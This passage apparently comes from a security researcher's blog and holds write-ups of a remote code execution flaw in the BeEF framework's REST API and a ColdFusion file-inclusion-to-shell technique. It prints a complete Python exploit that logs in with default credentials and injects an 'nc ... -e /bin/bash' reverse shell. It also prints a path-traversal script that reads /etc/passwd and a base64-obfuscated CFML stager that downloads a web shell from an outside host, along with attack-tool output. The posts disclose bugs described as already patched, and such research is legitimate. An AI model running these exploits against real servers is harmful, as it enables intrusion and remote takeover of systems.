Developing a plugin is sort of confusing and not exacty clear via their provided Github documentation, however the simplest way to do this is grab a pre-existing package and simply replace one of the functions with a shell.

That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.

rce in browser exploitation framework (BeEF)

14 May 2014 at 02:57

Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03022014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I’ve seen too many penetration testers leaving their tools externally exposed, often with default credentials.

The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.

The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Adds a new DNS rule
        post '/rule' do
          begin
            body = JSON.parse(request.body.read)

            pattern = body['pattern']
            type = body['type']
            response = body['response']

            # Validate required JSON keys
            unless [pattern, type, response].include?(nil)
              # Determine whether 'pattern' is a String or Regexp
              begin

                pattern_test = eval pattern
                pattern = pattern_test if pattern_test.class == Regexp
   #             end
              rescue => e;
              end

The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
import json
import sys

def fetch_default(ip):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'username' : 'beef', 'password' : 'beef' }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    if response.status_code is 200 and json.loads(response.content)['success']:
        return json.loads(response.content)['token']

try:
    ip = '192.168.1.6'

    if len(sys.argv) > 1:
        token = sys.argv[1]
    else:
        token = fetch_default(ip)

    if not token:
        print 'Could not get auth token'
        sys.exit(1)

    url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
    sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'

    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'pattern' : sploit,
             'type' : 'A',
             'response' : [ '127.0.0.1' ]
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code
except Exception, e:
    print e

You could execute ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).

There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:

1
2
3
4
5
6
7
8
9
def run_lfi(ip, token):
    url = 'http://%s:3000/api/server/bind?token=%s' % (ip, token)
    headers = { 'Content-Type' : 'application/json'}
    data = { 'mount' : "/tmp.txt",
             'local_file' : "/../../../etc/passwd"
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code

We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is still yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.

LFI to shell in Coldfusion 6-10

2 April 2014 at 21:10

ColdFusion has several very popular LFI’s that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser use of this LFI, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?

The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when used in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code. This is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFI’s to inject CFML and execute it on the remote system.

Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as example. CF8’s LFI lies in the locale parameter:

1
http://192.168.1.219:8500/CFIDE/administrator/enter.cfm?local=../../../../../../../../ColdFusion8\logs\application.log%00en

When exploited, this will dump the contents of application.log, a logging file that stores error messages.

We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any sort of characters we want; including CFML code.

The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:

1
<cfhttp method='get' url='#ToString(ToBinary('aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>

The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64’d to avoid some encoding issues with forward slashes. We then expand the local path to ../../ which drops us into wwwroot, which is the first directory accessible from the web server.

Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:

Which we can then access from the root directory:

A quick run of this in clusterd:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml 

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 5 platforms]

 [2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
 [2014-04-02 11:28PM] Servers' OS hinted at windows
 [2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
 [2014-04-02 11:28PM] Server hinted at 'coldfusion'
 [2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
 [2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
 [2014-04-02 11:28PM]   ColdFusion Manager (version 8.0)
 [2014-04-02 11:28PM] Fingerprinting completed.
 [2014-04-02 11:28PM] Injecting stager...
 [2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
 [2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
 [2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM

The downside to this method is remnance in a log file, which cannot be purged unless the CF server is shutdown (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand, that is, check if an argument is provided to the LFI and only parse and execute then.

A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.

❌
❌